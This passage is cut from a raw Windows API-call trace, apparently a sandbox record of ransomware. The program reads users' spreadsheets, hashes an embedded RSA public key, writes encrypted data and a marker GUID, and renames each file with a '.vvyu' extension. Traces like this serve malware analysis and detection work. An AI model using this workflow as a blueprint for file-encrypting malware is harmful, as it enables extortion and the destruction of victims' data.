lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0192.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0192.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0192.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0192.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0192.002] GetCurrentThreadId () returned 0x264 [0192.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0192.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44d80 [0192.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0192.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0192.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0192.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0192.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0192.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.003] GetCurrentThreadId () returned 0x264 [0192.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0192.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0192.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0192.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0192.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0192.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0192.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0192.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ce8 [0192.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0192.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0192.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0192.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0192.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0192.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0192.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c88 [0192.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0192.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0192.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0192.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0192.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0192.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ca0 [0192.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0192.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0192.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0192.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c70 [0192.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0192.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d00 [0192.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0192.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0192.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cd0 [0192.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0192.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39cb8 [0192.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39d18 [0192.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0192.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39cb8 [0192.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cd0 | out: hHeap=0x6a0000) returned 1 [0192.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0192.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0192.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0192.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0192.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0192.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0192.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c88 [0192.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0192.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0192.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ce8 | out: hHeap=0x6a0000) returned 1 [0192.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0192.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d18 | out: hHeap=0x6a0000) returned 1 [0192.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0192.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0192.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0192.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0192.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c88 | out: hHeap=0x6a0000) returned 1 [0192.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0192.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0192.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0192.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0192.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0192.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0192.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0192.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0192.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0192.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39cb8 | out: hHeap=0x6a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39d00 | out: hHeap=0x6a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ca0 | out: hHeap=0x6a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0192.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0192.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0192.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0192.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41920 | out: hHeap=0x6a0000) returned 1 [0192.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0192.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0192.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0192.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0192.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0192.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0192.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0192.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0192.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0192.015] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0xdaad, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0xdaad, lpOverlapped=0x0) returned 1 [0192.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.016] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xdab2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.017] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0192.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0192.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0192.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0192.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0192.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.018] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0192.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0192.018] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.019] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0192.019] CloseHandle (hObject=0x584) returned 1 [0192.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x6f4d00 [0192.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d45778 [0192.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6f4d00 | out: hHeap=0x6a0000) returned 1 [0192.021] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\5tWeVqoRi-de0YRYB.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\5twevqori-de0yryb.xls"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\5tWeVqoRi-de0YRYB.xls.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\5twevqori-de0yryb.xls.vvyu")) returned 1 [0192.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0192.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.023] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0192.026] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68c475c0, ftCreationTime.dwHighDateTime=0x1d897da, ftLastAccessTime.dwLowDateTime=0x757ce900, ftLastAccessTime.dwHighDateTime=0x1d89ded, ftLastWriteTime.dwLowDateTime=0x757ce900, ftLastWriteTime.dwHighDateTime=0x1d89ded, nFileSizeHigh=0x0, nFileSizeLow=0xe251, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a2_m3nQdrDmG.xlsx", cAlternateFileName="A2_M3N~1.XLS")) returned 1 [0192.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70270 [0192.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0192.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70270 | out: hHeap=0x6a0000) returned 1 [0192.027] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\a2_m3nQdrDmG.xlsx") returned=".xlsx" [0192.027] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\a2_m3nQdrDmG.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\a2_m3nqdrdmg.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.027] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=57937) returned 1 [0192.027] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0192.030] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe22b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.030] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0192.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.033] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.033] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xe251, lpOverlapped=0x0) returned 1 [0192.034] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0192.034] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.034] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.034] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0192.035] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0192.035] CryptHashData (hHash=0x2cbfa90, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.035] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0192.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0192.035] CryptGetHashParam (in: hHash=0x2cbfa90, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0192.035] GetLastError () returned 0x0 [0192.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0192.035] GetLastError () returned 0x0 [0192.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0192.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0192.035] CryptDestroyHash (hHash=0x2cbfa90) returned 1 [0192.036] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0192.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0192.036] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0192.036] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0192.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.036] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0192.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0192.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0192.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe250) returned 0x2d45778 [0192.037] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0192.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0192.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0192.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0192.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0192.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41920 [0192.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c58 [0192.037] RtlAllocateHeap 